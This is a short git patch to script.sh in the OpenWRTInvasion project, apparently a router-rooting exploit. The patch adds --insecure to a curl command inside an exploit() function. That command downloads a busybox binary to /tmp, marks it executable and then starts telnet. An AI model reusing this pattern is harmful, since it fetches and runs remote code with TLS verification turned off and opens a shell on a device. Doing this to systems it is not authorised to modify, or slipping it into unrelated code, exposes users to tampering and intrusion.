From 7bc75a698524e48c71091ed288e5bf6b4f103e23 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Andre=CC=81s=20Cecilia=20Luque?= Date: Fri, 11 Sep 2020 23:30:44 +0200 Subject: [PATCH] Add --insecure to the curl command, to avoid problems with SSL when the user runs the script in a complex network setup. See: https://github.com/acecilia/OpenWRTInvasion/issues/31#issuecomment-690755250 --- script.sh | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/script.sh b/script.sh index ff3c519..cd4e7a3 100644 --- a/script.sh +++ b/script.sh @@ -14,7 +14,8 @@ exploit() { cd /tmp rm -rf busybox - curl "https://www.busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-mipsel" --output busybox + # Rationale for using --insecure: https://github.com/acecilia/OpenWRTInvasion/issues/31#issuecomment-690755250 + curl "https://www.busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-mipsel" --insecure --output busybox chmod +x busybox # Start telnet